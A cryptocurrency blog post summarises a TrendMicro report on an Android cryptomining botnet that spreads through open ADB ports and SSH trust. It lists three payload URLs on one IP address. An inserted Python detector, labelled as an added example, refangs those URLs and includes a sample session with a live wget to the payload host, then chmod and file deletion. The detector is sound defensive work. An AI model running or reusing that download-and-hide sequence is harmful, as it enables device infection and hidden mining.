Report on the Latest Crypto Mining Malware Discovery by TrendMicro for Android Devices

Hackers have been going after the cryptocurrency market for as long as it has existed. Anonymous coins and other loopholes have made it possible for these bad players to get involved, and malware tends to be involved in many of these attacks. A new report from TrendMicro indicates that malware has now been discovered in an attack against some Android devices.

  • New malware botnet is hacking Android devices for mining.
  • Malware has evolved over time, and TrendMicro has found it in the past.

TrendMicro has found a new botnet that targets Android smartphones and tablets. The botnet goes after the Android Debug Bridge (ADB) ports on devices, even though ADB is a system meant to fix defects in Android-based apps. The botnet malware has already been found in 21 different countries, with South Korea appearing to be the most affected.

The attack takes advantage of the fact that open ADB ports require no authentication by default. After the malware is installed, it spreads to any system with which the device has shared an SSH connection. These connections link many types of devices, which means that many products are at risk.

The researchers with TrendMicro stated,

“Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe. The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections.”

The process begins with the first IP address arriving through ADB and using the command shell to update the working directory to a .tmp file. After the bot determines that it has reached its destination, it uses a wget command to download the payload of three separate miners. The malware is programmed to decide which miner can best exploit the infected device, based on the manufacturer, hardware, and other details.

Another command is executed to change the permission settings, and the bot then conceals itself with a further command that hides it from the host by deleting the file that was downloaded. Deleting the file removes the trail of where the bug came from in the first place, even though it continues to be used on other victims.

According to the researchers that examined the script used to invade these devices, there are three possible miners that could be used in the attack from the same URL:

  • http://198[.]98[.]51[.]104:282/x86/bash
  • http://198[.]98[.]51[.]104:282/arm/bash
  • http://198[.]98[.]51[.]104:282/aarch64/bash

In their research, TrendMicro also discovered that the host's memory is enhanced if HugePages is enabled, since this allows memory pages that exceed the default size. This change increases mining output. If miners are already using the device, the botnet tries to invalidate the URL and uses the host code to kill them.
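The behaviour described above can be turned into a simple detection pass over a device's shell command history. The following is an added example, not code from TrendMicro or from the article: it matches the three listed payload URLs (refanged), flags the download, permission change, delete sequence, and flags HugePages changes. The sample sessions are constructed, and the assumption that a HugePages change shows up as a command touching `nr_hugepages` is ours, not the report's.

```python
import re
from urllib.parse import urlsplit

# Indicators exactly as the article lists them (defanged).
DEFANGED_IOCS = [
    "http://198[.]98[.]51[.]104:282/x86/bash",
    "http://198[.]98[.]51[.]104:282/arm/bash",
    "http://198[.]98[.]51[.]104:282/aarch64/bash",
]
URL_RE = re.compile(r"https?://[^\s'\";|&]+")

def refang(text):
    """Undo the [.] defanging so indicators compare equal to logged URLs."""
    return text.replace("[.]", ".")

IOC_HOSTS = {urlsplit(refang(u)).netloc for u in DEFANGED_IOCS}

def analyze(commands):
    """Scan one session's commands in order; return (line_no, rule, detail)."""
    findings, state = [], {}  # state: downloaded file name -> stage reached
    for n, cmd in enumerate(commands, 1):
        args = cmd.split()
        if not args:
            continue
        names = {a.rsplit("/", 1)[-1] for a in args[1:]}
        if args[0] in ("wget", "curl"):
            for url in URL_RE.findall(cmd):
                state[url.rsplit("/", 1)[-1]] = "downloaded"
                if urlsplit(url).netloc in IOC_HOSTS:
                    findings.append((n, "known-payload-host", url))
        elif args[0] == "chmod":
            for name in names & set(state):
                state[name] = "permissions-changed"
        elif args[0] == "rm":
            for name in names & set(state):
                if state[name] == "permissions-changed":
                    findings.append((n, "download-chmod-delete", name))
        # Assumption: a HugePages change appears as a command naming nr_hugepages.
        if "nr_hugepages" in cmd:
            findings.append((n, "hugepages-changed", cmd))
    return findings

# Constructed sample sessions (not captured from a real device).
SUSPICIOUS = ["cd .tmp", f"wget {refang(DEFANGED_IOCS[1])}", "chmod 777 bash",
              "rm -f bash", "sysctl -w vm.nr_hugepages=128"]
BENIGN = ["wget https://example.org/tool.tar.gz", "chmod 644 tool.tar.gz"]

if __name__ == "__main__":
    for finding in analyze(SUSPICIOUS):
        print(finding)
```

The sequence rule fires even when the payload host changes, which matters because the downloaded file is deleted and the URL list alone will age quickly.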

Cryptocurrency mining malware keeps evolving, creating new ways to exploit victims for personal gain. TrendMicro found another type of malware that exploits ADB, called the Satoshi Variant.

To view the full report from TrendMicro, visit: here.


Krystle M
Krystle is an American cryptocurrency blogger that wants to see the future of crypto and blockchain technology evolve. She has been writing about cryptocurrency for about a year, with a special interest in blockchain technology and regulatory measures around the world. While away from writing and learning about the changes in the cryptocurrency industry, she likes to indulge in science fiction novels and further her experience in playing both guitar and piano.
